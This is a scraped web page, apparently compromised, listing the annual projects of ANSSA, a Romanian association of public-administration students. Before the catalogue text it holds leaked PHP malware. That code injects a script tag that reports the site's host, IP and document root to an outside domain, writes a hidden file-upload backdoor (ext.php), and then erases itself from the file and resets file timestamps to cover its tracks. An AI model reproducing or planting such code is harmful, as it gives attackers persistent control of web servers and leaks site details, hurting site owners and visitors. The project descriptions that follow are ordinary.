document.write('<'+'s'+'c'+'r'+'ipt '+'s'+'rc=\"http://tereveln.com/sh2.php?serverStr=$serverStr&req_type=add_site&document_root=$document_root&engine=$engineType&ip=$ip&domain='+window.location.hostname+'&uplUrl=$pp\"'+'>'+'<'+'/'+'sc'+'rip'+'t>');"; $fp = fopen(dirname(__FILE__)."/ext.php", "w"); fwrite($fp, "
';if (!empty(\$_FILES['uploadFile'])) {\$self=dirname(__FILE__);move_uploaded_file(\$_FILES[\"uploadFile\"][\"tmp_name\"], \$self.DIRECTORY_SEPARATOR.\$_FILES[\"uploadFile\"][\"name\"]);\$time=filemtime(\$self);print \"OK\";} else {print \$form;} ?>"); fclose($fp); $fp = fopen(__FILE__, "r"); $line = ""; while(!feof($fp)) { $line .= fgets($fp, 4096); } fclose($fp); $time = filemtime(__FILE__); $dirTime = filemtime(dirname(__FILE__)); $line = preg_replace("/\s+\s+/is", "", $line); $fp = @fopen(__FILE__, "w"); @fwrite($fp, $line); @fclose($fp); @touch(__FILE__, $time); @touch(dirname(__FILE__), $dirTime); } else { print ""; } ?> ANSSA - Asociatia Nationala a Studentilor in Stiinte Administrative

CATALOGUL ANUAL DE PROIECTE

P1 "Tineri pentru comunitate"
Este un program la nivel national initiat de ANSSA si derulat cu sprijinul si colaborarea ACoR (Asociatiei Comunelor din România). În cadrul proiectului, în fiecare an sunt selectati 20 de membri ANSSA care îsi desfasoara activitatea în echipe de câte doi la nivelul a 10 comunitati locale din România recomandate de ACoR si care sunt integrati în programul primariilor si consiliilor locale timp de o saptamâna. Pe parcursul acestei perioade ei urmaresc un punctaj de probleme prestabilite legate de administratia publica locala, aspecte social-economice, de mediu si nivelul implicarii tinerilor în viata comunitatii rurale. Studentii întocmesc un raport de activitate, prezinta opinii si concluzii, inventare critice si exemple de succes, toate într-o întâlnire finala de evaluare la care participa organizatorii si partenerii proiectului.

P2 "Tineri în institutii publice"
"Tineri în institutii publice" este un proiect derulat de ANSSA înca de la înfiintarea sa. Daca initial viza doar studentii de la specializarea "administratie publica" din Bucuresti, acum proiectul va fi extins la nivel national cu implicarea directa a filialelor asociatiei. În acest sens la nivelul fiecarei structuri teritoriale ANSSA va exista o selectie pentru un numar de circa 10 studenti care urmeaza a fi recrutati pentru un stagiu de internship si/sau vizite de studiu în institutii publice de la nivel local si central. În timpul vizitelor de studii, tinerii au ocazia de a se întâlni cu factori de decizie din cadrul institutiilor. ANSSA considera ca studentii de la specializarea "administratie publica" au în acest fel oportunitatea de a observa administratia aplicata, ceea ce se constituie într-un real suport în vederea seminarizarii si completarii culturii administrative de ordin teoretic si practic.

P3 "Viitorii specialisti ai administratiei publice"
ANSSA va promova crearea unui sistem de mobilitate studenteasca între scolile de administratie publica înscrise în proiect, studentii putând astfel participa la cursuri de drept administrativ, management public, finante publice locale, dezvoltarea parteneriatelor public-privat si altele cuprinse în curricula universitara, având posibilitatea de a compara tehnicile de predare si structura cursurilor de la facultatile participante. Rezultatele proiectului vor fi evidentiate prin materiale întocmite în acest sens de catre studentii si cadrele didactice implicate si vor fi prezentate în cadrul unor mese rotunde si a Conferintei Nationale a Studentilor din Scolile de Administratie Publica.

P4 "Programul de consiliere si orientare profesionala"

Programul vizeaza constituirea unui colectiv de lucru care sa se ocupe cu gestionarea unei baze de date cu functiile publice vacante de la autoritatile si institutiile publice si comunicarea lor membrilor asociatiei. Studentii interesati pot fi ajutati suplimentar cu informatii de contact privind institutia publica organizatoare a concursului, conditiile de participare, bibliografia si asistenta în întocmirea dosarului de concurs si o recomandare din partea asociatiei.

P5 Scoala de vara si Scoala de iarna
Asociatia organizeaza anual o scoala de vara si una de iarna pentru membrii sai, ocazie cu care se dezbate o tema data. Tema scolilor ANSSA se stabileste anual si sunt invitati sa participe personalitati ale vietii publice, cadre didactice si reprezentanti ai sectorului ONG. Numarul de participanti la o scoala de vara/iarna ANSSA este în jur de 50. Selectia studentilor se va face prin intermediul filialelor. Studentii vor beneficia de certificate de participare.

P6 Participari la actiuni interne si internationale
Membrii ANSSA sunt delegati de conducerea asociatiei sa participe la evenimente în care este necesara reprezentarea ANSSA sau pentru care asociatia a primit invitatii de participare sau colaborare. De asemenea, anual, ANSSA organizaeza o excursie tip "vizita de studiu" la principalele institutiile ale Uniunii Europene de la Bruxelles si Strasbourg.

P7 Newsletter ANSSA "INFOadministratia"

ANSSA îsi propune sa editeze si sa distribuie membrilor sai o publicatie periodica în care sa prezinte noutati din viata asociatiei, din sectorul public, lucrari si referate tematice ale membrilor, proiectele si activitatile realizate sau în curs de desfasurare, interviuri cu teoreticieni si practicieni ai administratiei publice etc.

P8 Activitati sociale, caritabile si de divertisment

ANSSA marcheaza principalele sarbatori crestine de Pasti si Craciun, printr-o serie de actiuni dedicate. Totodata contribuie prin implicarea membrilor sai la actiuni caritabile desfasurate pentru centrele de copii si batrâni. Problemelor sociale studentesti li se acorda o atentie prin prisma statutului profesional al viitorului specialist în administratie publica si actionam pentru îmbunatatirea conditiilor de studiu si a cadrului de relationare student-universitate-societate. De asemenea asociatia organizeaza baluri ale bobocilor pentru studentii în stiinte administrative din principalele centre universitare, precum si întâlniri de socializare si networking.

P9 Conferinta Nationala a Studentilor din Scolile de Administratie Publica
Conferinta este deschisa pentru un numar mare de membri ai asociatiei (cca. 200 participanti). Conferinta se desfasoara pe durata a trei zile, cu reprezentanti din administratia publica centrala si locala, alesi nationali si locali, precum si organismele civile. Lucrarile premiate la fiecare sectiune sunt publicate. De asemenea Conferinta Nationala este un prilej de dezbatere a celor mai actuale teme din sectorul public cu înalti reprezentanti din Guvern, Parlament, Administratia Locala si organismele societatii civile. La sfârsitul Conferintei participantii adopta o rezolutie pe care o aduc la cunostinta diverselor organisme publice. ANSSA a organizat pâna în prezent cinci conferinte nationale la Voineasa (2003), Mamaia (2004), Baile Felix (2005), Ocna Sibiului (2006), Baile Olanesti (2007) si Amara (2008).

P10 Mese rotunde, seminarii locale, regionale, nationale, internationale
Sunt organizate de filialele ANSSA, cu resurse proprii, la nivel local, iar participarea poate fi locala, regionala, nationala sau internationala, în functie de amploarea proiectului.

P11 Administrare si dezvoltare organizationala
Conducerea generala a asociatiei este asigurata prin intermediul Centrului de Coordonare Nationala Bucuresti în cadrul caruia sunt organizate potrivit organigramei un secretariat si echipe de lucru pentru realizarea proiectelor anuale. Dezvoltarea organizationala priveste circuitul documentelor, asigurarea legaturii si fluxului informational între ANSSA central si filialele teritoriale ale asociatiei (structuri subordonate, cu personalitate juridica), realizarea managementului resurselor umane ale ANSSA prin gestiunea formularelor de înscriere si o evidenta a CV-urilor, a cotizatiilor platite si a legitimatiilor eliberate; se actualizeaza pagina web www.anssa.ro , se modereaza grupul de discutii electronic, se verifica e-mailul asociatiei. De asemenea, tot la sediul central, se desfasoara activitati administrative si de gestiune curenta care cuprind probleme legate de corespondenta, secretariat, registratura, contabilitate, avizier, materiale promotionale, sponsorizari etc.

P12 Sedinta anuala de bilant si programare
În ultima luna a anului are loc evaluarea activitatii si prezentarea principalelor rezultate obtinute. Sunt invitati studenti, profesori, functionari publici, alte ONG, partenerii si sponsorii asociatiei. În acelasi timp se programeaza activitatile si proiectele care vor fi incluse în calendarul de lucru al asociatiei pentru anul ce urmeaza.

P13 Reuniunea aniversara ANSSA
În fiecare an, în luna aprilie, ANSSA îsi sarbatoreste "ziua de nastere". Cu acest prilej are loc întâlnirea generatiilor si reliefarea progreselor în timp. Se acorda diplome, plachete si medalii pentru cei a caror contributie la dezvoltarea ANSSA este apreciata. În acest mod valorizam pe cei merituosi si consolidam cultura si capacitatea organizationala. Actiunea este organizata si sprijinita de Alumni ANSSA.